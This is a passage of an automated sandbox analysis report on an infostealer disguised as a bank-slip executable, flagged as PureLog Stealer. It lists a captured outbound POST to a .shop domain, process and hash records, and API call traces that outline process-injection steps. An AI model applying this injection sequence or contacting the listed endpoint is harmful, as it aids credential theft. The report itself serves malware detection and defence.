                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1322&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=750&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                      55 | 192.168.2.4 | 50062 | 188.114.96.3 | 80
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:08:09.578994036 CEST | 10832 | OUT | POST /3p0l/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.timizoasisey.shop
                                                                                                      Origin: http://www.timizoasisey.shop
                                                                                                      Referer: http://www.timizoasisey.shop/3p0l/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:08:10.448340893 CEST | 1052 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:08:10 GMT
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2FL46wwhSTWrH3QNUJLXHXLbAU5CvzW9KthIEa9MWQ0GE9JC6dqbO70UXYkVseSAa5KGUZsYPgtIADoRZtpL9gZmNzv18ZaIDm%2FG3xu5pgIpbTYMbZs5zXSeols4yIo4PFD2l09nPVI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a7932bee4870-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10832&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                      Target ID:0
                                                                                                      Start time:03:04:02
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                                                                                                      Imagebase:0xba0000
                                                                                                      File size:762'880 bytes
                                                                                                      MD5 hash:1FCDE6F41117BDC978A69990608ECC69
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1781279015.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1770346968.0000000004139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:03:04:09
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                                                                                                      Imagebase:0xbd0000
                                                                                                      File size:762'880 bytes
                                                                                                      MD5 hash:1FCDE6F41117BDC978A69990608ECC69
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:03:04:20
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe"
                                                                                                      Imagebase:0xf0000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:7
                                                                                                      Start time:03:04:23
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                                                                                                      Imagebase:0x230000
                                                                                                      File size:86'528 bytes
                                                                                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Target ID:8
                                                                                                      Start time:03:04:49
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff6bf500000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.7%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:124
                                                                                                        Total number of Limit Nodes:9

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'tq$TJyq$Tetq$pxq$xbwq
                                                                                                        • API String ID: 0-3259335386
                                                                                                        • Opcode ID: c281e7f7a2ad5502d38c67cd7b39818a103e1f6385e5cad4c08f7679ccb1dd28
                                                                                                        • Instruction ID: 099cbf2759b72294f00d61c93fe1f6175a32d5e26d4f7cb0fdd34fe37a3aa71c
                                                                                                        • Opcode Fuzzy Hash: c281e7f7a2ad5502d38c67cd7b39818a103e1f6385e5cad4c08f7679ccb1dd28
                                                                                                        • Instruction Fuzzy Hash: E8B2C175E00229DFDB64CF69C984AD9BBB2FF89300F1481E9D509AB265DB319E81CF40

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02F7D476
                                                                                                        • GetCurrentThread.KERNEL32 ref: 02F7D4B3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02F7D4F0
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02F7D549
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 5385c1c02f88b863638027dcc86aa43c30eb92d1fe6584b1a54c28c5d9c0f844
                                                                                                        • Instruction ID: 13455b489ab7678f5c4ba726acc8c36d9246a45d4c6350cece7d9cd69da53acc
                                                                                                        • Opcode Fuzzy Hash: 5385c1c02f88b863638027dcc86aa43c30eb92d1fe6584b1a54c28c5d9c0f844
                                                                                                        • Instruction Fuzzy Hash: C15155B0D016498FCB58DFAAC648BDEBBF1AF88314F24845AE009A7290D7345984CB61

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 2f7d3f8-2f7d487; API call nodes: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId]
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02F7D476
                                                                                                        • GetCurrentThread.KERNEL32 ref: 02F7D4B3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02F7D4F0
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02F7D549
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: c332aa5cceb4f6df1eb0fd22db360eb54c9c2a26b7e72c6935e789184690fd47
                                                                                                        • Instruction ID: deca25ba4515d0536a6fdd0665312faedda436c239075fa6d8c7d6e9b2af04b8
                                                                                                        • Opcode Fuzzy Hash: c332aa5cceb4f6df1eb0fd22db360eb54c9c2a26b7e72c6935e789184690fd47
                                                                                                        • Instruction Fuzzy Hash: CB5165B0D00649CFDB58DFAAD648B9EBBF1EF8C314F24845AE409A7390D7346984CB65

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 766f336-766f3d5; API call node: CreateProcessA]
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0766F576
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 76b0b00a681959f939efcf4a36b8aef3c3a1f7f3c039c64123eae5051779b6d1
                                                                                                        • Instruction ID: 5ad4858a5d7d868a1214d62172b3bbba45161232fd6aa752b59f1c95231d741d
                                                                                                        • Opcode Fuzzy Hash: 76b0b00a681959f939efcf4a36b8aef3c3a1f7f3c039c64123eae5051779b6d1
                                                                                                        • Instruction Fuzzy Hash: F2917BB1D0021ACFDB20CF68D845BEDBBB2BF48314F54856AE809B7290DB749985CF91

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 766f340-766f3d5; API call node: CreateProcessA]
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0766F576
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: e0c5cb44c3078f85ba5708d461a920e4783806f602dd80a3edb9b817e57d68e2
                                                                                                        • Instruction ID: cba74ceb57affe255138d7c66411eabb09fead09aedae5fd66bde45c00c07636
                                                                                                        • Opcode Fuzzy Hash: e0c5cb44c3078f85ba5708d461a920e4783806f602dd80a3edb9b817e57d68e2
                                                                                                        • Instruction Fuzzy Hash: 2E916AB1D0021ACFDB20CF68D845BEDBBB2BF48314F54856AE809A7290DB749985CF91

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 2f7ad68-2f7ad77; API call node: GetModuleHandleW]
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7AFBE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: d1efc33e9051217a8db6e1d65d4fee8e324c9387f31eeb0317a812848e3d9cc8
                                                                                                        • Instruction ID: 796129e8f0528b6a5100848ce9529097c3a1157bd97625153205b279fcf9f763
                                                                                                        • Opcode Fuzzy Hash: d1efc33e9051217a8db6e1d65d4fee8e324c9387f31eeb0317a812848e3d9cc8
                                                                                                        • Instruction Fuzzy Hash: D88167B0A00B058FD724DF6AD54079ABBF2FF88344F01892ED58ADBA50D775E846CB90

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 2f7590c-2f75916; API call node: CreateActCtxA]
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02F759C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: f4ab3f5517522785e136912a2efbd80283b5da3ad54b80550ca333b109055193
                                                                                                        • Instruction ID: fb4dde68a9de936a7038cc27925e409f9cc578707797fa3fb606ab21a40cedff
                                                                                                        • Opcode Fuzzy Hash: f4ab3f5517522785e136912a2efbd80283b5da3ad54b80550ca333b109055193
                                                                                                        • Instruction Fuzzy Hash: F441E4B0C00759CFDB24CFA9C884B8DBBF6BF49304F64806AD408AB251DB756945CF90

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 2f744e0-2f759d9; API call node: CreateActCtxA]
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02F759C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 275b3d7edb22cab2134fbf07b8016ac93376e9f9e281d5f8d6f056f424b0dc7d
                                                                                                        • Instruction ID: 6e90eaa8762e4005b53df8d2a856c689cc19fbe5c41682df6d819b6d51212d30
                                                                                                        • Opcode Fuzzy Hash: 275b3d7edb22cab2134fbf07b8016ac93376e9f9e281d5f8d6f056f424b0dc7d
                                                                                                        • Instruction Fuzzy Hash: AE41D1B0D0061DCFEB24CFA9C884BDDBBB6BF48304F60816AD908AB251DB756945CF90

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 2f7d701-2f7d708; API call node: DuplicateHandle]
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D6C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 17978bcb064f6e59d7a6665581db63c50d5192c63a4824ecb805b52df448e3d8
                                                                                                        • Instruction ID: 4e90fa3c4eb9603cf795037920855c692847a64ad7e08066dc8aae4d00db9bc1
                                                                                                        • Opcode Fuzzy Hash: 17978bcb064f6e59d7a6665581db63c50d5192c63a4824ecb805b52df448e3d8
                                                                                                        • Instruction Fuzzy Hash: 9431C175A013848FEB48EF61F8457B93BA2F788755F118069EA218B7D4CAB91885CF11

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 766f0b0-766f106; API call node: WriteProcessMemory]
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0766F148
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: a3292ee6db2024deaa4ab11f39265689f354299b3cc1536fe1a88534acf35058
                                                                                                        • Instruction ID: 203f3a027d085c3431605efd461e619695486073527bf2dd4c6242d27914a8bb
                                                                                                        • Opcode Fuzzy Hash: a3292ee6db2024deaa4ab11f39265689f354299b3cc1536fe1a88534acf35058
                                                                                                        • Instruction Fuzzy Hash: BF2148B59002499FCB10CFAAD845BEEBBF5FF48324F508429E519A7240C7799941CBA0

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 766f0b8-766f106; API call node: WriteProcessMemory]
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0766F148
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 2963e78fd71b3e07a348dad64de24606f525dc30f97810b929787b6d5a992b0f
                                                                                                        • Instruction ID: 7b68f28880064bef14531e1397e312360dfd00c456ce19109259d52b2bfe6321
                                                                                                        • Opcode Fuzzy Hash: 2963e78fd71b3e07a348dad64de24606f525dc30f97810b929787b6d5a992b0f
                                                                                                        • Instruction Fuzzy Hash: 272127B19003599FDB10CFAAC885BEEBBF5FF48320F508429E919A7240D7799944CBA0

                                                                                                        Control-flow Graph
                                                                                                        • [Graph figure omitted: first block 766ef19-766ef6b; API call node: Wow64SetThreadContext]
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766EF9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0

                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0766F228
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D6C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0766F228
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766EF9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D6C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766F066
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766F066
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        APIs
                                                                                                        • ResumeThread.KERNELBASE(73013C05), ref: 0766EED2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        APIs
                                                                                                        • ResumeThread.KERNELBASE(73013C05), ref: 0766EED2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7AFBE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 07B3121D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1784215164.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7b30000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 07B3121D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1784215164.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7b30000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769043550.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_152d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769098529.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769098529.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8cb590323ebad35fd1127ab3d06eb50a7fd5b1e7de7219863705b38c2d635077
                                                                                                        • Instruction ID: 63d7563bc82e816f49c67dff5277b3857d10fcc8b6a5aa536119d08c6149041a
                                                                                                        • Opcode Fuzzy Hash: 8cb590323ebad35fd1127ab3d06eb50a7fd5b1e7de7219863705b38c2d635077
                                                                                                        • Instruction Fuzzy Hash: AA2103B1504200DFDB15DF98D480B26FBB5FB88B14F64C96DE9494F246D33AD407CA61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769098529.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 19a64f721eb0fde0503a95896fb86b0b9a3ba01d20ade31037bca889b22ca1e1
                                                                                                        • Instruction ID: 252735a631c16c85ad5276a9e0c7f2d3349a06377184b507aaddbe32a465ee3d
                                                                                                        • Opcode Fuzzy Hash: 19a64f721eb0fde0503a95896fb86b0b9a3ba01d20ade31037bca889b22ca1e1
                                                                                                        • Instruction Fuzzy Hash: 19217F755093808FDB12CF64D990B15BF71FB86214F28C5DAD8498F2A7C33A980ACB62
                                                                                                        Memory Dump Source
